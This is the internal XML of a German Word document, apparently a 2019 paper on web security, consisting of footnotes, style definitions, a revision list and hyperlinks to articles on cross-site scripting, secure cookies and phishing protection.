    <w:p w14:paraId="6474E635" w14:textId="0A25F9C5" w:rsidR="00446B5F" w:rsidRDefault="00446B5F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https://de.wikipedia.org/wiki/Cross-Site-Scripting</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
  </w:footnote>
  <w:footnote w:id="2">
    <w:p w14:paraId="38DDAA82" w14:textId="521A41D2" w:rsidR="00446B5F" w:rsidRDefault="00446B5F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https://pentest-tools.com/blog/xss-attacks-practical-scenarios/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
  </w:footnote>
  <w:footnote w:id="3">
    <w:p w14:paraId="04BBB014" w14:textId="0AF77F4B" w:rsidR="00446B5F" w:rsidRDefault="00446B5F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https://wiki.selfhtml.org/wiki/Grundlagen/sichere_Cookies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DB"/>
    <w:rsid w:val="000215F8"/>
    <w:rsid w:val="000434B8"/>
    <w:rsid w:val="000453DA"/>
    <w:rsid w:val="000531CF"/>
    <w:rsid w:val="00061A68"/>
    <w:rsid w:val="00081A12"/>
    <w:rsid w:val="00087378"/>
    <w:rsid w:val="000878E1"/>
    <w:rsid w:val="00091F56"/>
    <w:rsid w:val="000926AB"/>
    <w:rsid w:val="000A3FEB"/>
    <w:rsid w:val="000A62E6"/>
    <w:rsid w:val="000C654F"/>
    <w:rsid w:val="000E1125"/>
    <w:rsid w:val="000E1237"/>
    <w:rsid w:val="000E13C0"/>
    <w:rsid w:val="000E78B8"/>
    <w:rsid w:val="000F264A"/>
    <w:rsid w:val="0011464B"/>
    <w:rsid w:val="001220F6"/>
    <w:rsid w:val="00125AB1"/>
    <w:rsid w:val="00137353"/>
    <w:rsid w:val="00156C8D"/>
    <w:rsid w:val="001617B6"/>
    <w:rsid w:val="00165F2B"/>
    <w:rsid w:val="0018412A"/>
    <w:rsid w:val="00191D4A"/>
    <w:rsid w:val="001C47F4"/>
    <w:rsid w:val="001D1D17"/>
    <w:rsid w:val="001E030A"/>
    <w:rsid w:val="00201BF8"/>
    <w:rsid w:val="00210CA1"/>
    <w:rsid w:val="0023160C"/>
    <w:rsid w:val="00233C29"/>
    <w:rsid w:val="0023529B"/>
    <w:rsid w:val="00251B7D"/>
    <w:rsid w:val="0025230C"/>
    <w:rsid w:val="002558D2"/>
    <w:rsid w:val="00265128"/>
    <w:rsid w:val="0026777B"/>
    <w:rsid w:val="00270398"/>
    <w:rsid w:val="00292EAE"/>
    <w:rsid w:val="002B4BAE"/>
    <w:rsid w:val="002C40DA"/>
    <w:rsid w:val="002C6B66"/>
    <w:rsid w:val="003002B0"/>
    <w:rsid w:val="00304BB5"/>
    <w:rsid w:val="003258DD"/>
    <w:rsid w:val="00332E44"/>
    <w:rsid w:val="003445D8"/>
    <w:rsid w:val="00344BC4"/>
    <w:rsid w:val="00345F1C"/>
    <w:rsid w:val="00346AE2"/>
    <w:rsid w:val="003577D5"/>
    <w:rsid w:val="0036203D"/>
    <w:rsid w:val="003622CC"/>
    <w:rsid w:val="00366359"/>
    <w:rsid w:val="00380F20"/>
    <w:rsid w:val="003845D6"/>
    <w:rsid w:val="00385FEB"/>
    <w:rsid w:val="0039747D"/>
    <w:rsid w:val="003A263F"/>
    <w:rsid w:val="003A7206"/>
    <w:rsid w:val="003B450E"/>
    <w:rsid w:val="003B47AD"/>
    <w:rsid w:val="003C41C9"/>
    <w:rsid w:val="003C6D51"/>
    <w:rsid w:val="003F2042"/>
    <w:rsid w:val="003F50FB"/>
    <w:rsid w:val="003F7917"/>
    <w:rsid w:val="00413974"/>
    <w:rsid w:val="004271C7"/>
    <w:rsid w:val="00446B5F"/>
    <w:rsid w:val="00471BF9"/>
    <w:rsid w:val="004B4744"/>
    <w:rsid w:val="004C2E6D"/>
    <w:rsid w:val="004D24DF"/>
    <w:rsid w:val="004F097C"/>
    <w:rsid w:val="00511A8C"/>
    <w:rsid w:val="005204B9"/>
    <w:rsid w:val="00520B75"/>
    <w:rsid w:val="00535580"/>
    <w:rsid w:val="00535752"/>
    <w:rsid w:val="00540D2D"/>
    <w:rsid w:val="00545C0D"/>
    <w:rsid w:val="0055037B"/>
    <w:rsid w:val="005649EA"/>
    <w:rsid w:val="00567CA2"/>
    <w:rsid w:val="00573C98"/>
    <w:rsid w:val="005A0152"/>
    <w:rsid w:val="005A54BA"/>
    <w:rsid w:val="005A6FBD"/>
    <w:rsid w:val="005B4765"/>
    <w:rsid w:val="00606543"/>
    <w:rsid w:val="00621650"/>
    <w:rsid w:val="00627BCC"/>
    <w:rsid w:val="00645BEF"/>
    <w:rsid w:val="006465AC"/>
    <w:rsid w:val="0065412B"/>
    <w:rsid w:val="00664D6D"/>
    <w:rsid w:val="00664E7A"/>
    <w:rsid w:val="00671A82"/>
    <w:rsid w:val="006912C7"/>
    <w:rsid w:val="006A62DB"/>
    <w:rsid w:val="006D4A9A"/>
    <w:rsid w:val="006E0D14"/>
    <w:rsid w:val="007165B5"/>
    <w:rsid w:val="00731B19"/>
    <w:rsid w:val="00742679"/>
    <w:rsid w:val="007509B9"/>
    <w:rsid w:val="00771377"/>
    <w:rsid w:val="00780850"/>
    <w:rsid w:val="00795BE6"/>
    <w:rsid w:val="00797362"/>
    <w:rsid w:val="007F4318"/>
    <w:rsid w:val="008054BB"/>
    <w:rsid w:val="008066AB"/>
    <w:rsid w:val="008106E9"/>
    <w:rsid w:val="00824F41"/>
    <w:rsid w:val="0083153D"/>
    <w:rsid w:val="00857024"/>
    <w:rsid w:val="00866724"/>
    <w:rsid w:val="0086761E"/>
    <w:rsid w:val="00881BA1"/>
    <w:rsid w:val="008A69BD"/>
    <w:rsid w:val="008D73EE"/>
    <w:rsid w:val="00902CAC"/>
    <w:rsid w:val="00910A69"/>
    <w:rsid w:val="00916008"/>
    <w:rsid w:val="00940882"/>
    <w:rsid w:val="00976AFF"/>
    <w:rsid w:val="00980840"/>
    <w:rsid w:val="0098191B"/>
    <w:rsid w:val="009B2F29"/>
    <w:rsid w:val="009C4D76"/>
    <w:rsid w:val="009C51CD"/>
    <w:rsid w:val="009E18DB"/>
    <w:rsid w:val="009E71B5"/>
    <w:rsid w:val="00A033AB"/>
    <w:rsid w:val="00A0663F"/>
    <w:rsid w:val="00A07E95"/>
    <w:rsid w:val="00A52679"/>
    <w:rsid w:val="00A704C2"/>
    <w:rsid w:val="00A73191"/>
    <w:rsid w:val="00A754F8"/>
    <w:rsid w:val="00A75F6A"/>
    <w:rsid w:val="00AA63D4"/>
    <w:rsid w:val="00AB0873"/>
    <w:rsid w:val="00AB22B0"/>
    <w:rsid w:val="00AC0621"/>
    <w:rsid w:val="00AD0AF3"/>
    <w:rsid w:val="00AD590F"/>
    <w:rsid w:val="00AE12ED"/>
    <w:rsid w:val="00AF61D2"/>
    <w:rsid w:val="00AF7E6C"/>
    <w:rsid w:val="00B012BB"/>
    <w:rsid w:val="00B31BC1"/>
    <w:rsid w:val="00B63FF4"/>
    <w:rsid w:val="00B7107F"/>
    <w:rsid w:val="00B91B23"/>
    <w:rsid w:val="00B94BA7"/>
    <w:rsid w:val="00BB1219"/>
    <w:rsid w:val="00BD005A"/>
    <w:rsid w:val="00BD621C"/>
    <w:rsid w:val="00BF5B18"/>
    <w:rsid w:val="00BF675E"/>
    <w:rsid w:val="00C215FA"/>
    <w:rsid w:val="00C376E3"/>
    <w:rsid w:val="00C523A3"/>
    <w:rsid w:val="00C527C1"/>
    <w:rsid w:val="00C75CB8"/>
    <w:rsid w:val="00C87CFC"/>
    <w:rsid w:val="00CB033C"/>
    <w:rsid w:val="00CE3200"/>
    <w:rsid w:val="00CF3213"/>
    <w:rsid w:val="00D151C3"/>
    <w:rsid w:val="00D17ACA"/>
    <w:rsid w:val="00D3485C"/>
    <w:rsid w:val="00D369D1"/>
    <w:rsid w:val="00D4345A"/>
    <w:rsid w:val="00D56693"/>
    <w:rsid w:val="00D66E01"/>
    <w:rsid w:val="00D80840"/>
    <w:rsid w:val="00DA34D8"/>
    <w:rsid w:val="00DA3D45"/>
    <w:rsid w:val="00DC7B0B"/>
    <w:rsid w:val="00DD227A"/>
    <w:rsid w:val="00DE49A5"/>
    <w:rsid w:val="00DF12CE"/>
    <w:rsid w:val="00E01303"/>
    <w:rsid w:val="00E03A40"/>
    <w:rsid w:val="00E27540"/>
    <w:rsid w:val="00E60AA8"/>
    <w:rsid w:val="00EA676F"/>
    <w:rsid w:val="00EA6784"/>
    <w:rsid w:val="00EC51BC"/>
    <w:rsid w:val="00EE3D0F"/>
    <w:rsid w:val="00F217CE"/>
    <w:rsid w:val="00F44D3C"/>
    <w:rsid w:val="00F51439"/>
    <w:rsid w:val="00F8303E"/>
    <w:rsid w:val="00F97F93"/>
    <w:rsid w:val="00FA38A0"/>
    <w:rsid w:val="00FA48C3"/>
    <w:rsid w:val="00FD5BCD"/>
    <w:rsid w:val="00FD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6DF4895"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{166AD65F-16B6-EF40-A6CA-9071B623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E3D0F"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman (Textkörper CS)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465AC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="min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65AC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0D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E18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E1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465AC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Ditoberschrift1">
    <w:name w:val="Dito Überschrift 1"/>
    <w:basedOn w:val="berschrift1"/>
    <w:qFormat/>
    <w:rsid w:val="009E18DB"/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9E18D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E18DB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5A6F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Standard"/>
    <w:qFormat/>
    <w:rsid w:val="007509B9"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="404040" w:themeFill="text1" w:themeFillTint="BF"/>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz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65AC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia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4D24D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D24DF"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman (Textkörper CS)"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Fuzeile">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Standard"/>
    <w:link w:val="FuzeileZchn"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004D24D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D24DF"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman (Textkörper CS)"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Verzeichnis2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003C6D51"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="24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A73191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05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054BB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8054BB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Absatz-Standardschriftart"/>
    <w:rsid w:val="008054BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="k">
    <w:name w:val="k"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:rsid w:val="008054BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nx">
    <w:name w:val="nx"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:rsid w:val="008054BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="p">
    <w:name w:val="p"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:rsid w:val="008054BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:rsid w:val="008054BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s2">
    <w:name w:val="s2"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:rsid w:val="008054BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nb">
    <w:name w:val="nb"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:rsid w:val="008054BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="berschrift3Zchn">
    <w:name w:val="Überschrift 3 Zchn"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:link w:val="berschrift3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="006E0D1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46B5F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46B5F"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman (Textkörper CS)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46B5F"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BesuchterLink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A033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Metazeichen" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.selfhtml.org/wiki/Grundlagen/sichere_Cooki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Metazeichen" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-tools.com/blog/xss-attacks-practical-scenario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e.wikipedia.org/wiki/Cross-Site-Script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onsumentenschutz.ch/wie-kann-man-sich-vor-phishing-schuetzen/?gclid=Cj0KCQiAq97uBRCwARIsADTziyYs7o9EwkR_YbyBJZRSYHOeoC6OjvO2wkZumzK1Z6ZVnwsKT5_sf_gaAgEKEALw_wcB" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.konsumentenschutz.ch/wie-kann-man-sich-vor-phishing-schuetzen/?gclid=Cj0KCQiAq97uBRCwARIsADTziyYs7o9EwkR_YbyBJZRSYHOeoC6OjvO2wkZumzK1Z6ZVnwsKT5_sf_gaAgEKEALw_wc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si-fuer-buerger.de/BSIFB/DE/Risiken/SpamPhishingCo/Phishing/Schutzmassnamen/schutzmassnamen_node.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bsi-fuer-buerger.de/BSIFB/DE/Risiken/SpamPhishingCo/Phishing/Schutzmassnamen/schutzmassnamen_node.html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iki.selfhtml.org/wiki/Grundlagen/sichere_Cookies" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-tools.com/blog/xss-attacks-practical-scenarios/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://de.wikipedia.org/wiki/Cross-Site-Scriptin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8B8FB2-5743-BC43-B353-7F655E9BE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876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Kessler Stephanie</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kessler Stephanie</cp:lastModifiedBy>
  <cp:revision>205</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-12T07:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-22T16:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>